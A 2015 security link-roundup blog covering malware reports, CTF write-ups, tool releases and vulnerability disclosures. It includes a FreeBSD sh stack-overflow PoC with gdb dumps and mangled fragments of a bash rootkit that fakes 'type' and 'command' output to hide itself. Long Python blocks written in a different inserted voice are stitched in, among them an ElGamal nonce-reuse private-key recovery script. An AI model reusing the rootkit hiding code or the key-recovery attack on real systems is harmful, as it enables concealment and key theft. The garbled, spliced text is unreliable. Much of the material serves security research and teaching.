Tuesday, March 31, 2015

New reconnaissance threat Trojan.Laziok targets the energy sector

A new information stealer, Trojan.Laziok, acts as a reconnaissance tool allowing attackers to gather information and tailor their attack methods for each compromised computer.

more here........http://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector

FreeBSD/SH Stack Overflow Vulnerability

I found that sh has a stack overflow bug on FreeBSD (9.0-10.0). It may be
triggered on all FreeBSD systems, but I have not tested that yet. The PoC below
is tested on FreeBSD 10.0 amd64 arch:

$ ls
$ . brootkit.sh
$ command
$ ls
brootkit.sh     sh.core

(gdb) x/16x $rsp+0x1b8
0x7fffdfffeff8: Cannot access memory at address 0x7fffdfffeff8
(gdb) x/16x $rsp+0x1c0
0x7fffdffff000: 0x0000000000000000      0x0000000000000000
0x7fffdffff010: 0x0000000000000000      0x0000000000000000
0x7fffdffff020: 0x0000000000000000      0x0000000000000000
0x7fffdffff030: 0x0000000000000000      0x0000000000000000
0x7fffdffff040: 0x0000000000000000      0x0000000000000000
0x7fffdffff050: 0x0000000000000000      0x0000000000000000
0x7fffdffff060: 0x0000000000000000      0x0000000000000000
0x7fffdffff070: 0x0000000000000000      0x0000000000000000

(gdb) disass malloc malloc+32
Dump of assembler code from 0x800d593f0 to 0x800d59410:
0x0000000800d593f0 <malloc+0>:  push   %rbp
0x0000000800d593f1 <malloc+1>:  mov    %rsp,%rbp
0x0000000800d593f4 <malloc+4>:  push   %r15
0x0000000800d593f6 <malloc+6>:  push   %r14
0x0000000800d593f8 <malloc+8>:  push   %r13
0x0000000800d593fa <malloc+10>: push   %r12
0x0000000800d593fc <malloc+12>: push   %rbx
0x0000000800d593fd <malloc+13>: sub    $0x488,%rsp
0x0000000800d59404 <malloc+20>: mov    %rdi,-0x4a0(%rbp)
0x0000000800d5940b <malloc+27>: mov    0x2c2dbe(%rip),%rax        #
0x80101c1d0 <__nsdefaultsrc+4928>

# gdb script: walk the saved-frame-pointer chain and disassemble each return address
set $i=0
set $addr=$rbp
while ($i <= 1000)
printf "frame[%d] 0x%lx ==> 0x%lx retaddr: 0x%lx\t diass: ", $i, $addr, *(long *)$addr, *(long *)($addr+8)
x/i  *(long *)($addr+8)
set $i=$i+1
set $addr=*(long *)$addr
end

frame[98] 0x7fffe0004c00 ==> 0x7fffe0004d60 retaddr: 0x406465    diass:
0x406465 <execve () plt+14073>:    incq   0x21d694(%rip)        # 0x623b00
frame[99] 0x7fffe0004d60 ==> 0x7fffe0004e10 retaddr: 0x40513b    diass:
0x40513b <execve () plt+9167>:     mov    -0x74(%rbp),%r14d
frame[100] 0x7fffe0004e10 ==> 0x7fffe0004ec0 retaddr: 0x405118   diass:
0x405118 <execve () plt+9132>:     cmpl   $0x0,0x21e9f5(%rip)        #
0x623b14 <environ+84>




        local fake_a

        unset command
        case $1 in
                        fake_a="$(command builtin $1 $2)"
                        br_hide_engine "$fake_a"
                        return ;;
                        echo "sh: builtin: builtin: syntax error, sh is not
                        return ;;
                        command builtin $1 $2

        case $1 in
                        echo "$1 is a shell builtin"
                        return ;;
                        echo "dir is /usr/bin/dir"
                        return ;;
                        echo "ls is aliased to ls --color=tty"
                        return ;;
                        echo "ps is /bin/ps"
                        return ;;
                        echo "netstat is hashed (/usr/bin/netstat)"
                        return ;;
                        echo "$1 is $1"
                        return ;;
                        unset command
                        command type $1 $2
                        return ;;

        case $1 in
                        echo "sh: syntax error, sh is not support."
                        return ;;
                        unset $1 $2
                        return ;;

        case $1 in
                        echo "sh: syntax error, sh is not support."
                        return ;;
                        unset command
                        command $1 $2
                        return ;;

        case $1 in
                        builtin $2 $3
                        return ;;
                        fake_unset $2 $3
                        . $BR_ROOTKIT_PATH/brootkit.sh
                        return ;;
                        type $2 $3
                        return ;;
                        fake_command $2 $3
                        return ;;
                        unset command
                        command $2 $3
                        . $BR_ROOTKIT_PATH/brootkit.sh
                        return ;;

                case $1 in
                                builtin $2 $3
                                return ;;
                                set $2 $3
                                return ;;
                                fake_unset $2 $3
                                . $BR_ROOTKIT_PATH/brootkit.sh
                                return ;;
                                type $2 $3
                                return ;;
                                fake_command $2 $3
                                return ;;
                                unset command
                                command $2 $3
                                . $BR_ROOTKIT_PATH/brootkit.sh
                                return ;;

Authored by wzt wzt 
wzt.wzt@gmail com

CTF challenges on docker hub

insomnihack's recently updated repositories.......https://hub.docker.com/u/insomnihack/

XSS flaws expose weaknesses on Amazon and UK newspaper websites

Cross-site scripting (XSS) flaws are amongst the most commonly encountered security flaws found on websites, opening up opportunities for malicious hackers to hijack customer accounts, change users’ settings and phish login credentials.
Unfortunately, it only requires a single web developer to make a mistake to open up opportunities which online criminals can exploit to launch potentially dangerous attacks.
And, although you would like to think that some of the world’s busiest websites would have trained their staff to avoid making the code blunders which can lead to an XSS attack, time and time again we hear of high profile vulnerabilities being found in familiar places.

more here.......http://blog.lumension.com/9973/xss-flaws-expose-weaknesses-on-amazon-and-uk-newspaper-websites/

DOMPurify 0.6.2 release

DOMPurify, the DOM-only, super-fast, uber-tolerant XSS sanitizer for HTML, MathML and SVG: version 0.6.2 here.......https://github.com/cure53/DOMPurify/releases/tag/0.6.2

and for those not familiar with DOMPurify here is additional info......https://github.com/cure53/DOMPurify

Introducing VirtuaPlant 0.1, Industrial Control System Simulator with Physics UI, Soft-PLC (modbus enabled), networked HMI and some ready-made skiddies attack scripts

Today I’m releasing a project I’ve been working on for the past week which I called VirtuaPlant more here...........http://wroot.org/posts/introducing-virtuaplant-0-1/


This is a quick recap of why I'm sad about SMTP encryption. It explains how TLS certificate verification in SMTP is useless even if you force it.

more here...........https://blog.filippo.io/the-sad-state-of-smtp-encryption/


[Michael] sells a remote control spy tank through his company, and although it’s a toy, there’s an impressive amount of electronics in this R/C tank. It’s controlled from an Android or iDevice over a WiFi connection, something that simply won’t do if you’re trying to sell this to the hacker and maker crowd. The solution to this problem is Wireshark, and with a little bit of work this spy tank can be controlled from just about anything, from a microcontroller via WiFi to a Python app.

more here..........http://hackaday.com/2015/03/30/reverse-engineering-an-rc-spy-tank/

Detection, analysis and display of attacks using Honeypots

Thanks to the use of honeypots and the analysis of the data they generate, we can scope the magnitude of the problem we face, obtaining valuable data regarding:

Attack tendencies.
Exploited vulnerabilities.
Services that attackers aim to compromise.
Most active countries in cyberattacks.
Malware samples unidentified by antivirus engines.
Techniques used by attackers.
Malware distributors.
Systems belonging to botnets.
Command and Control Centers (C&C).

more here...........https://www.incibe.es/blogs/post/Security/SecurityBlog/Article_and_comments/honeystation_EN

Airbnb JavaScript Style Guide

A mostly reasonable approach to JavaScript here.....https://github.com/airbnb/javascript

metasploitHelper Release and Slides at Blackhat Asia Arsenal 2015

Metasploit contains port-based modules as well as URI-based modules (web servers). This tool bridges an Nmap XML file with Metasploit and generates a resource script containing the matching Metasploit modules that you can run against the target servers.

more here.........https://github.com/milo2012/metasploitHelper

and slides here......http://www.slideshare.net/keith55/metasploithelper-spiderlabs?qid=9057aace-fef0-40f5-ae8e-51fa5d587dd7&v=default&b=&from_search=1

nmap2nessus Release and Slides From Black Hat Asia Arsenal 2015

How nmap2nessus works:
Takes an Nmap XML file as input and extracts the 'open' ports and live IP addresses.
Logs into the Nessus server and makes a copy of the 'selected' policy.
Modifies the port_range parameter in the policy settings and uploads the new policy.
Uses the 'default' Nessus policy.
Starts a new Nessus scan using the new policy.
Queries the Nessus server for the status of the job until the job is completed.
Saves the Nessus report and extracts the important findings.
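The first three steps above amount to "parse the Nmap XML, keep live hosts and confirmed open ports, build a port_range". As an added example (my own code, not nmap2nessus's), the following Python does exactly that on a constructed Nmap XML document; the sample hosts and the function names are assumptions made for the example. The string it builds is the comma-separated port list that a Nessus policy's port_range setting accepts, and a host that is down or a UDP port reported only as open|filtered is deliberately left out.

```python
import xml.etree.ElementTree as ET

# Constructed sample Nmap XML for this example (not real scan output).
# 192.0.2.12 is down and 161/udp is only "open|filtered", so both must be ignored.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -sS -oX scan.xml 192.0.2.0/29" version="6.47">
  <host>
    <status state="up" reason="echo-reply"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/><service name="ssh"/></port>
      <port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/><service name="http"/></port>
      <port protocol="tcp" portid="443"><state state="closed" reason="reset"/></port>
    </ports>
  </host>
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="192.0.2.11" addrtype="ipv4"/>
    <address addr="00:11:22:33:44:55" addrtype="mac"/>
    <ports>
      <port protocol="tcp" portid="8443"><state state="open" reason="syn-ack"/><service name="https-alt"/></port>
      <port protocol="udp" portid="161"><state state="open|filtered" reason="no-response"/></port>
    </ports>
  </host>
  <host>
    <status state="down" reason="no-response"/>
    <address addr="192.0.2.12" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Map each live host's IP to its sorted list of (protocol, port) pairs in state "open".

    Hosts that are not up, have no IP address, or expose no open port are dropped,
    which is what step 1 above (live IPs and open ports) needs.
    """
    root = ET.fromstring(xml_text)
    results = {}
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        ip = next((a.get("addr") for a in host.findall("address")
                   if a.get("addrtype") in ("ipv4", "ipv6")), None)
        if ip is None:
            continue
        open_ports = []
        for port in host.iterfind("ports/port"):
            state = port.find("state")
            # Exact match on "open": "open|filtered" is an unanswered UDP probe, not a confirmed service.
            if state is not None and state.get("state") == "open":
                open_ports.append((port.get("protocol"), int(port.get("portid"))))
        if open_ports:
            results[ip] = sorted(open_ports)
    return results


def nessus_port_range(results):
    """Collapse every open TCP port across all hosts into the comma-separated list
    that a Nessus policy's port_range setting accepts (step 3 above)."""
    tcp_ports = sorted({port for ports in results.values() for proto, port in ports if proto == "tcp"})
    return ",".join(str(p) for p in tcp_ports)


def live_targets(results):
    """Sorted list of IPs that had at least one open port, i.e. the scan's target list."""
    return sorted(results)


if __name__ == "__main__":
    found = parse_nmap_xml(SAMPLE_NMAP_XML)
    print("targets:", ",".join(live_targets(found)))
    print("port_range:", nessus_port_range(found))
```

Restricting the scan to ports Nmap already confirmed open is what keeps the Nessus job short; if the Nmap run was itself filtered or rate-limited, the resulting port_range is only as complete as that scan.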

more here......https://github.com/milo2012/nmap2nessus

and slides here....http://www.slideshare.net/keith55/nmap2nessus-presentation-slides-at-black-hat-asia-arsenal-2015?qid=ec52197a-2e0f-4638-a7aa-d70e22bbc265&v=default&b=&from_search=1

0ctf 2015 quals – forward (web250)

At the start we’ve only got a URL to our target webserver.

When we click on “Login” we get a JavaScript popup which tells us “You Are Not Authorized!”. Then we click on “FLAG”, because that’s what we want. Unfortunately we don’t get a flag yet, but the source code of admin.php is revealed.

more here......http://blog.squareroots.de/en/2015/03/0ctf-2015-quals-forward-web250/

China's Man-on-the-Side Attack on GitHub

We have looked closer at this attack, and can conclude that China is using their active and passive network infrastructure in order to perform a man-on-the-side attack against GitHub.

more here.....http://www.netresec.com/?page=Blog&month=2015-03&post=China%27s-Man-on-the-Side-Attack-on-GitHub

Monday, March 30, 2015

LFI Freak

A unique automated LFi Exploiter with Bind/Reverse Shells
more here...........https://github.com/OsandaMalith/LFiFreak

0CTF Writeup- RSAQuine

For this challenge we had to find all possible messages that are unconcealed when applying RSA with the given e and n, i.e. messages whose ciphertext equals the plaintext (these messages are called quines in this challenge).

more here..........http://tasteless.eu/2015/03/0ctf-2015-rsaquine/
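To make "unconcealed" concrete, here is an added Python example (mine, not the tasteless write-up's code) on a toy key: m is unconcealed when m^e ≡ m (mod n). Rather than trying every m, it solves x^e ≡ x separately modulo p and q (x = 0 plus the gcd(e-1, p-1) elements of the cyclic group Z_p^* whose order divides e-1) and combines the per-prime solutions with the CRT; a brute-force pass checks the result. The closed-form count (1+gcd(e-1,p-1))(1+gcd(e-1,q-1)) also shows that every RSA key has at least nine such messages, since e-1, p-1 and q-1 are all even. The parameters p = 11, q = 13, e = 7 are constructed for the example.

```python
from math import gcd


def primitive_root(p):
    """Smallest generator of the multiplicative group mod an odd prime p (brute force, toy sizes only)."""
    phi = p - 1
    prime_factors = {f for f in range(2, phi + 1)
                     if phi % f == 0 and all(f % k for k in range(2, int(f ** 0.5) + 1))}
    for g in range(2, p):
        if all(pow(g, phi // f, p) != 1 for f in prime_factors):
            return g
    raise ValueError("no generator found (p must be an odd prime)")


def fixed_points_mod_prime(e, p):
    """All x in Z_p with x^e == x: x = 0 plus the d = gcd(e-1, p-1) solutions of x^(e-1) == 1.

    Z_p^* is cyclic of order p-1, so those solutions are exactly its unique subgroup of order d.
    """
    d = gcd(e - 1, p - 1)
    h = pow(primitive_root(p), (p - 1) // d, p)   # generator of that subgroup
    return sorted({pow(h, k, p) for k in range(d)} | {0})


def crt_combine(a, p, b, q):
    """The unique x mod p*q with x == a (mod p) and x == b (mod q), for coprime p and q."""
    t = ((b - a) * pow(p, -1, q)) % q
    return (a + p * t) % (p * q)


def unconcealed_messages(e, p, q):
    """Every m in [0, p*q) with m^e == m (mod p*q), built from the per-prime solutions via the CRT."""
    return sorted(crt_combine(a, p, b, q)
                  for a in fixed_points_mod_prime(e, p)
                  for b in fixed_points_mod_prime(e, q))


def count_unconcealed(e, p, q):
    """Closed form for the number of unconcealed messages of an RSA key (n = p*q, p != q)."""
    return (1 + gcd(e - 1, p - 1)) * (1 + gcd(e - 1, q - 1))


def brute_force_unconcealed(e, n):
    """Reference check for toy sizes: try every m."""
    return [m for m in range(n) if pow(m, e, n) == m]


if __name__ == "__main__":
    p, q, e = 11, 13, 7          # toy parameters, constructed for this example
    assert gcd(e, (p - 1) * (q - 1)) == 1
    fixed = unconcealed_messages(e, p, q)
    print(len(fixed), "unconcealed messages for e=%d, n=%d:" % (e, p * q), fixed)
```

For a real-size modulus only the CRT route is feasible, and it needs the factorisation of n, which is why the count is a property of the key holder's parameters rather than something an outsider can enumerate; for a properly chosen key the nine-plus fixed points are a negligible fraction of the message space.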

bamfdetect v1.6.3 Nanocore module release

Identifies and extracts information from bots and other malware. Information is returned in a readable json format. bamfdetect works by reading files into RAM, applying any applicable preprocessors, then applying Yara signatures from modules to determine which module it matches. After a match is located, the module can then extract the configuration from the file.

more here........https://github.com/bwall/bamfdetect

and  Nanocore v1.6.3 module release here....https://github.com/bwall/bamfdetect/releases/tag/v1.6.3

0CTF 2015 - mislead (web 300)

We are welcomed with a login page where we can register a new account and log in with it.
After logging in to the application we received:

Hello pwntester. Try to login as 0ops!

The first thing I looked for was SQL injection in the register and login forms. The register one turned out to be injectable, and we can use the duplicate-entry technique to dump the DB

more here.......http://www.pwntester.com/blog/2015/03/30/0ctf-2015-mislead-web-300/

Threat Spotlight: Dyre/Dyreza: An Analysis to Discover the DGA

Banking and sensitive financial information is a highly coveted target for attackers because of the high value and obvious financial implications.  In the past year, a large amount of attention has been centered on Point of Sale (PoS) malware due to its major role in the compromise of several retailers.  While PoS malware is a major concern, attackers have also realized that targeting individual end users is an effective method of harvesting other types of financial data.  As a result, banking malware has become a prevalent category of malware that poses a major threat to users and organizations of all sizes.

more here.........http://blogs.cisco.com/security/talos/threat-spotlight-dyre

ZeroBrane Studio

ZeroBrane Studio is a lightweight Lua IDE with code completion, syntax highlighting, live coding, code analyzer, and debugging support for Lua 5.1, Lua 5.2, Lua 5.3, LuaJIT, and other Lua engines.

It is simple and instantly usable for beginners (as tested with middle and high school students with no programming experience), yet feature-rich and extensible for experienced developers. Unlike Eclipse and IntelliJ, it has a small footprint and is completely customizable with Lua. Unlike TextMate and Sublime Text, it includes a remote debugger and a full IDE feature set. Unlike Decoda, it runs on Windows, Mac OSX, and Linux and supports on-device debugging.

more here...........http://studio.zerobrane.com/

Boston Key Party 2015 'Wood Island' writeup

Originally, I wanted to write up the write-up for the airport challenge, but since Niklas has already done that, I’m doing the Wood Island challenge instead. It was worth 150 points on the Boston Key Party 2015.

The goal was to break ElGamal Signatures. In short, the solution is based on exploiting “random” values that occur multiple times.

more here..........https://kitctf.de/writeups/bkp2015/wood-island/
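The "random" values the write-up refers to are ElGamal's per-signature exponents k. As an added example (my code, not the kitctf solution), the Python below implements textbook ElGamal signatures over a toy safe prime and shows the failure mode: two signatures made with the same k share the same r, and from that pair k and then the private key x fall out of two linear congruences modulo p-1. Because p-1 is even, the coefficients need not be invertible, so the solver enumerates the gcd-many candidates and keeps the one consistent with r = g^k and y = g^x. The prime p = 1019, the key and the messages are constructed for the example; the lesson for a verifier is that identical r values across signatures from one key are a red flag, and a signer must draw k fresh from a CSPRNG for every signature (or derive it deterministically from key and message, as RFC 6979 does for DSA).

```python
import hashlib
from math import gcd

# Toy safe prime p = 2*q + 1, constructed for this example; far too small for real use.
P = 1019
Q = (P - 1) // 2


def find_generator(p, q):
    """Smallest generator of Z_p^* for a safe prime p = 2q+1: g generates iff g^2 != 1 and g^q != 1."""
    for g in range(2, p):
        if pow(g, 2, p) != 1 and pow(g, q, p) != 1:
            return g
    raise ValueError("not a safe prime")


G = find_generator(P, Q)


def h(message):
    """Message hash reduced into the exponent group Z_(p-1)."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % (P - 1)


def keygen(x):
    """Private x in [1, p-2], public y = g^x mod p."""
    return x, pow(G, x, P)


def sign(x, message, k):
    """Textbook ElGamal: r = g^k, s = k^-1 (H(m) - x r) mod (p-1); k must be fresh and coprime to p-1."""
    if gcd(k, P - 1) != 1:
        raise ValueError("k must be coprime to p-1")
    r = pow(G, k, P)
    s = (pow(k, -1, P - 1) * (h(message) - x * r)) % (P - 1)
    return r, s


def verify(y, message, sig):
    """Accept iff y^r * r^s == g^H(m) (mod p) with r, s in range."""
    r, s = sig
    if not (0 < r < P and 0 <= s < P - 1):
        return False
    return (pow(y, r, P) * pow(r, s, P)) % P == pow(G, h(message), P)


def solve_linear(a, b, n):
    """All x in Z_n with a*x == b (mod n): gcd(a, n) solutions when gcd(a, n) divides b, else none."""
    d = gcd(a, n)
    if b % d:
        return []
    a, b, n = a // d, b // d, n // d
    x0 = (b * pow(a, -1, n)) % n
    return [x0 + i * n for i in range(d)]


def recover_private_key(y, m1, sig1, m2, sig2):
    """Given two signatures with the same r (hence the same k), recover k and then x.

    s1 - s2 == k^-1 (h1 - h2)  =>  (s1 - s2) k == h1 - h2 (mod p-1)
    s1 == k^-1 (h1 - x r)      =>  r x == h1 - k s1      (mod p-1)
    Candidates from the gcd are checked against r = g^k and y = g^x.
    """
    (r1, s1), (r2, s2) = sig1, sig2
    if r1 != r2:
        return None                      # different k: the nonce was not reused
    n = P - 1
    for k in solve_linear((s1 - s2) % n, (h(m1) - h(m2)) % n, n):
        if pow(G, k, P) != r1:
            continue
        for x in solve_linear(r1 % n, (h(m1) - k * s1) % n, n):
            if pow(G, x, P) == y:
                return x
    return None


if __name__ == "__main__":
    x, y = keygen(123)
    sig1 = sign(x, b"message one", 77)   # same k reused on purpose to show the failure
    sig2 = sign(x, b"message two", 77)
    print("shared r:", sig1[0] == sig2[0], "recovered x:", recover_private_key(y, b"message one", sig1, b"message two", sig2))
```

The check on r1 == r2 is the cheap, key-independent symptom a log auditor can look for: two signatures from the same key with the same r mean the same k was used, whatever the messages were.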

SQL Inception: How to select yourself

In this blog post I will describe a few ways to view the whole SQL statement being executed as part of a SQL injection attack. Currently, unless the vulnerable page returns the SQL statement in an error message, performing an attack involves an amount of guesswork by the attacker. The more complicated the original SQL statement, the more difficult it can become to extract data using faster UNION based techniques.

If the type of injection is blind then this can take time to perform and cause a lot of traffic to be generated, especially when extracting a significant amount of data from the database. This prompted the question - “Wouldn’t this be a lot easier if I could see the SQL being executed?”

more here............http://www.contextis.com/resources/blog/sql-inception-how-select-yourself/

Stack overflow in libtasn1


libtasn1 is a library to parse ASN.1 data structures. Its most
prominent user is GnuTLS.

Fuzzing libtasn1 led to the discovery of a stack write overflow in the
function _asn1_ltostr (file parser_aux.c). It overflows a temporary
buffer variable on certain inputs. This issue has been reported to the
developers on 2015-03-26. A fix was released on 2015-03-29.

The issue can be exposed with Valgrind or Address Sanitizer. The
Address Sanitizer output with detailed info is given below.

Git commit / fix
Release notes libtasn1 4.4
Sample input for stack overflow (to be used with examples/pkix.asn from
libtasn1 source, e.g. src/asn1Decoding examples/pkix.asn

An earlier fuzzing effort led to the discovery of a null pointer
dereference error in the ASN.1 definition parser. This is unlikely to
have any security impact. Null pointer errors are usually not
exploitable and there are probably no scenarios where ASN.1 definitions
are attacker controlled. This issue has been reported to the libtasn1
developers on 2015-01-25 and was fixed on 2015-02-05. The fix was
delivered with the 4.3 release of libtasn1.

Report on mailing list
Git commit / fix
Sample input for null ptr (can be tested with asn1Decoding
TFPA-2015-002-libtasn1-4.2-null-ptr.asn x x)

I want to thank libtasn1 developer Nikos Mavrogiannopoulos for the
quick fixes. Both issues were found with american fuzzy lop.

==4372==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff85a08084 at pc 0x43c180 bp 0x7fff85a07d10 sp 0x7fff85a07d00
WRITE of size 1 at 0x7fff85a08084 thread T0
    #0 0x43c17f in _asn1_ltostr /data/libtasn1/libtasn1-4.3/lib/parser_aux.c:574
    #1 0x41ee31 in _asn1_get_objectid_der /data/libtasn1/libtasn1-4.3/lib/decoding.c:397
    #2 0x41ee31 in asn1_der_decoding2 /data/libtasn1/libtasn1-4.3/lib/decoding.c:1225
    #3 0x423b0e in asn1_der_decoding /data/libtasn1/libtasn1-4.3/lib/decoding.c:1602
    #4 0x403692 in simple_decode /data/libtasn1/libtasn1-4.3/src/asn1Decoding.c:251
    #5 0x403692 in decode /data/libtasn1/libtasn1-4.3/src/asn1Decoding.c:280
    #6 0x403692 in main /data/libtasn1/libtasn1-4.3/src/asn1Decoding.c:205
    #7 0x7f94cb39af9f in __libc_start_main (/lib64/libc.so.6+0x1ff9f)
    #8 0x4046a1 (/data/libtasn1/libtasn1-4.3/src/asn1Decoding+0x4046a1)

Address 0x7fff85a08084 is located in stack of thread T0 at offset 564 in frame
    #0 0x419bdf in asn1_der_decoding2 /data/libtasn1/libtasn1-4.3/lib/decoding.c:980

  This frame has 10 object(s):
    [32, 36) 'len2'
    [96, 100) 'tag_len'
    [160, 164) 'len2'
    [224, 232) 'p'
    [288, 296) 'p2'
    [352, 360) 'ptail'
    [416, 424) 'p'
    [480, 489) 'temp'
    [544, 564) 'temp' <== Memory access at offset 564 overflows this variable
    [608, 736) 'temp'
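Reports like the one above are the raw material of fuzzing triage, so as an added example (mine, not part of Hanno's report) here is a small Python parser for AddressSanitizer output. It extracts the error class, the access type and size, the stack frames and the frame's object layout, and computes how many bytes past the end of the flagged object the access landed. The constant it parses is the report quoted above; the regexes use whitespace wildcards so the same parser also works on output whose lines were run together.

```python
import re

# The AddressSanitizer report quoted above, embedded verbatim as sample input.
ASAN_REPORT = """==4372==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff85a08084 at pc 0x43c180 bp 0x7fff85a07d10 sp 0x7fff85a07d00
WRITE of size 1 at 0x7fff85a08084 thread T0
    #0 0x43c17f in _asn1_ltostr /data/libtasn1/libtasn1-4.3/lib/parser_aux.c:574
    #1 0x41ee31 in _asn1_get_objectid_der /data/libtasn1/libtasn1-4.3/lib/decoding.c:397
    #2 0x41ee31 in asn1_der_decoding2 /data/libtasn1/libtasn1-4.3/lib/decoding.c:1225
    #3 0x423b0e in asn1_der_decoding /data/libtasn1/libtasn1-4.3/lib/decoding.c:1602
    #4 0x403692 in simple_decode /data/libtasn1/libtasn1-4.3/src/asn1Decoding.c:251
    #5 0x403692 in decode /data/libtasn1/libtasn1-4.3/src/asn1Decoding.c:280
    #6 0x403692 in main /data/libtasn1/libtasn1-4.3/src/asn1Decoding.c:205
    #7 0x7f94cb39af9f in __libc_start_main (/lib64/libc.so.6+0x1ff9f)
    #8 0x4046a1 (/data/libtasn1/libtasn1-4.3/src/asn1Decoding+0x4046a1)

Address 0x7fff85a08084 is located in stack of thread T0 at offset 564 in frame
    #0 0x419bdf in asn1_der_decoding2 /data/libtasn1/libtasn1-4.3/lib/decoding.c:980

  This frame has 10 object(s):
    [32, 36) 'len2'
    [96, 100) 'tag_len'
    [160, 164) 'len2'
    [224, 232) 'p'
    [288, 296) 'p2'
    [352, 360) 'ptail'
    [416, 424) 'p'
    [480, 489) 'temp'
    [544, 564) 'temp' <== Memory access at offset 564 overflows this variable
    [608, 736) 'temp'
"""

HEADER_RE = re.compile(
    r"==(?P<pid>\d+)==ERROR: AddressSanitizer: (?P<kind>[\w-]+) on address\s+(?P<addr>0x[0-9a-f]+)"
    r".*?\b(?P<access>READ|WRITE)\s+of size\s+(?P<size>\d+)", re.S)
# "in <func>" is optional: frames without symbols only carry "<pc> (<module>+<offset>)".
FRAME_RE = re.compile(r"#(?P<idx>\d+)\s+(?P<pc>0x[0-9a-f]+)\s+(?:in\s+(?P<func>\S+)\s+)?(?P<loc>\S+)")
OBJECT_RE = re.compile(r"\[(?P<lo>\d+),\s*(?P<hi>\d+)\)\s+'(?P<name>[^']+)'(?P<hit>\s+<== Memory access at offset\s+\d+)?")


def parse_asan_report(text):
    """Split the report into the access description, the stack trace and the frame's object layout."""
    head, _, tail = text.partition("\nAddress ")
    m = HEADER_RE.search(head)
    if m is None:
        raise ValueError("not an AddressSanitizer error report")
    frames = [{"idx": int(f["idx"]), "pc": f["pc"], "func": f["func"], "loc": f["loc"]}
              for f in FRAME_RE.finditer(head)]
    objects = [{"lo": int(o["lo"]), "hi": int(o["hi"]), "name": o["name"], "hit": o["hit"] is not None}
               for o in OBJECT_RE.finditer(tail)]
    hit = next((o for o in objects if o["hit"]), None)
    size = int(m["size"])
    off_match = re.search(r"at offset\s+(\d+)", tail)
    offset = int(off_match.group(1)) if off_match else None
    return {
        "kind": m["kind"], "access": m["access"], "size": size, "address": m["addr"],
        "frames": frames, "objects": objects, "overflowed": hit,
        # how many bytes of the access lie beyond the end of the overflowed object
        "bytes_past_end": (offset + size - hit["hi"]) if hit and offset is not None else None,
    }


def summarize(report):
    """One-line triage string: where the bad access happened and what it clobbered."""
    top = report["frames"][0]
    what = report["overflowed"]
    return "%s %s of %d byte(s) in %s at %s, %d byte(s) past '%s' [%d, %d)" % (
        report["kind"], report["access"], report["size"], top["func"], top["loc"],
        report["bytes_past_end"], what["name"], what["lo"], what["hi"])


if __name__ == "__main__":
    print(summarize(parse_asan_report(ASAN_REPORT)))
```

For this report the parser confirms what the text says: a one-byte write in _asn1_ltostr landing exactly one byte past the 20-byte 'temp' buffer at [544, 564) of the asn1_der_decoding2 frame, which is the kind of off-by-one a fixed-size conversion buffer produces.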

Hanno Böck

mail/jabber: hanno@hboeck.de

commix- Automated All-in-One OS Command Injection and Exploitation Tool

Commix (short for [comm]and [i]njection e[x]ploiter) has a simple environment and it can be used by web developers, penetration testers or even security researchers to test web applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or string. Commix is written in the Python programming language.

more here...........https://github.com/stasinopoulos/commix

Sign Up at irs.gov Before Crooks Do It For You (Good Advice)

If you’re an American and haven’t yet created an account at irs.gov, you may want to take care of that before tax fraudsters create an account in your name and steal your personal and tax data in the process.

read more......http://krebsonsecurity.com/2015/03/sign-up-at-irs-gov-before-crooks-do-it-for-you/

2 Federal Agents in Silk Road Case Face Fraud Charges (I can honestly say I'm not in the least bit surprised)

Two former federal agents are expected to be arrested on Monday on charges of stealing money while working undercover on an investigation into Silk Road, the once-thriving black market website for drug dealing, a document shows.

more here......http://mobile.nytimes.com/2015/03/31/nyregion/silk-road-case-federal-agents-charges.html?_r=0

and this was just 4 days prior if anyone recalls....http://www.washingtonpost.com/world/national-security/report-dea-agents-had-sex-parties-with-prostitutes-hired-by-drug-cartels/2015/03/26/adb2d53e-d3bd-11e4-8fce-3941fc548f1c_story.html

All I can say is be wary of the U.S. Justice System as it's not as just as one may think, IMO; i.e. Aaron Swartz and countless others.

A timeline of mobile botnets

The recent explosion in smartphone usage has not gone unnoticed by malware authors. Indeed, malware authors have increasingly focused their attention on mobile devices, leading to a steep rise in mobile malware over the past couple of years. This paper focuses particularly on mobile bot variants that can be controlled remotely by an attacker. The paper begins with a comparison between mobile and PC botnets, discussing fundamental, conceptual and implementational differences between them. Next, some precursors to fully functional mobile bots are discussed, along with some proof-of-concept mobile botnets that have been published for research purposes.

more here................https://www.virusbtn.com/pdf/magazine/2015/vb201503-mobile-botnets.pdf

Exploiting CVE-2011-2461 on google.com

As a follow up of our Troopers 2015 presentation about CVE-2011-2461 we want to release more details about a real world exploitation scenario targeting Google services.
During our large-scale analysis of web sites hosting vulnerable SWF files, we found out that Google was also affected.

more here........http://blog.mindedsecurity.com/2015/03/exploiting-cve-2011-2461-on-googlecom.html

and FAQ page with test cases here.....http://blog.nibblesec.org/2015/03/cve-2011-2461-is-back-faq.html

GitHub Status Page After DDoS - All systems reporting at 100%. Attack traffic continues, so we remain on high alert.

Good work continuously updating users here......https://status.github.com/messages?latest


Argon2 is a new hash function, which summarizes the state of the art in the design of memory-hard functions. It is a streamlined and simple design. It aims at the highest memory filling rate and effective use of multiple computing units, while still providing defense against tradeoff attacks. Argon2 is optimized for the x86 architecture and exploits the cache and memory organization of the recent Intel and AMD processors.

more here..........https://www.cryptolux.org/index.php/Argon2

Snort now available!

Snort Security Onion Update and Additional Info Here.....http://blog.securityonion.net/2015/03/snort-2972-now-available.html


Simple framework to extract "actionable" data from Android malware (C&Cs, phone numbers etc.) here...https://github.com/maldroid/maldrolyzer

Paper: Preventing Use-after-free with Dangling Pointers Nullification

